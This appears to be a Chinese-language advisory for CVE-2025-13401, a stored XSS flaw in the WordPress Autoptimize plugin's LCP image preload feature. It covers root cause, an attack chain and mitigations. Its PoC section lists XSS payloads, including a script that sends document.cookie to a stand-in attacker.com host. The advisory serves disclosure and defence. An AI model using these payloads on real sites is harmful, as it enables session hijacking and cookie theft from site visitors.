CVE-2025-13401 WordPress Autoptimize插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13401

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Autoptimize插件

漏洞概述

CVE-2025-13401是WordPress Autoptimize插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于插件的LCP(Largest Contentful Paint)图片预加载功能中，由于对用户提供的图片属性缺乏足够的输入清理和输出转义，攻击者可以在页面中注入恶意JavaScript脚本。受影响版本为3.1.13及之前所有版本。攻击者需要拥有WordPress contributor级别或更高的用户权限即可利用此漏洞。成功利用后，恶意脚本会在任何访问包含注入代码页面的用户浏览器中执行，可能导致会话劫持、敏感信息窃取或其他恶意操作。由于是存储型XSS，恶意脚本会持久保存在数据库中，对所有访问该页面的用户造成持续威胁。

技术细节

漏洞根源在于Autoptimize插件的create_img_preload_tag函数对用户输入的图片属性处理不当。该函数在处理LCP Image预加载元数据时，直接将用户提供的图片属性拼接到HTML输出中，未进行适当的输入验证和输出编码。攻击者通过LCP Image to preload metabox功能，提交包含恶意JavaScript代码的图片属性值，如在src、alt或其他属性中注入<script>标签或事件处理器(如onerror、onload等)。由于缺乏sanitization和escaping，这些恶意代码被直接存储到数据库中，并在页面加载时未经处理地输出到前端。攻击者只需拥有 contributor 权限即可创建或编辑包含XSS payload的内容，当管理员或其他用户访问该页面时，恶意脚本即在受害者浏览器上下文中执行，可窃取cookies、劫持会话或进行其他恶意操作。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用WordPress和Autoptimize插件，检查插件版本是否在3.1.13或更早版本

STEP 2

权限获取

攻击者通过社会工程、凭证泄露或其他方式获取WordPress contributor级别或更高权限的用户账户

STEP 3

漏洞利用准备

攻击者登录WordPress后台，创建或编辑文章/页面，在Autoptimize的LCP Image to preload metabox中构造XSS payload

STEP 4

恶意代码注入

将包含JavaScript代码的图片属性(如onerror事件处理器)注入到LCP预加载设置中，保存并发布内容

STEP 5

持久化存储

恶意XSS代码被存储到WordPress数据库中，在页面每次加载时都会从数据库读取并输出

STEP 6

受害者触发

当管理员、编辑或访客访问包含恶意代码的页面时，浏览器执行注入的JavaScript代码

STEP 7

恶意操作执行

攻击者可通过XSS窃取用户cookies、会话令牌，执行未授权操作，或将受害者重定向到钓鱼页面

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Autoptimize Plugin XSS PoC - CVE-2025-13401 -->
<!-- Requires Contributor+ level access -->

<!-- LCP Image Preload XSS Payload Examples -->

<!-- Example 1: Image src attribute injection -->
<img src="x" onerror="alert(document.cookie)" />

<!-- Example 2: Alt attribute injection with event handler -->
<img src="valid-image.jpg" alt="<img src=x onerror=alert('XSS')>" />

<!-- Example 3: Full script injection -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

<!-- Attack Flow: -->
<!-- 1. Authenticate as Contributor or higher -->
<!-- 2. Navigate to Post/Page Editor -->
<!-- 3. Find Autoptimize LCP Image to preload metabox -->
<!-- 4. Insert XSS payload in image attributes -->
<!-- 5. Save/Publish the post -->
<!-- 6. Any user visiting the page triggers the XSS -->

影响范围

Autoptimize插件 <= 3.1.13 (所有版本)

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 审查所有用户权限，撤销不必要的contributor及以上权限账户；2) 启用WordPress的强力密码策略和多因素认证；3) 使用安全插件限制敏感功能的访问；4) 临时禁用Autoptimize插件的LCP预加载功能；5) 部署Web应用防火墙规则过滤恶意请求；6) 监控网站日志，关注异常的JavaScript执行和API调用。建议尽快升级到插件官方发布的安全版本。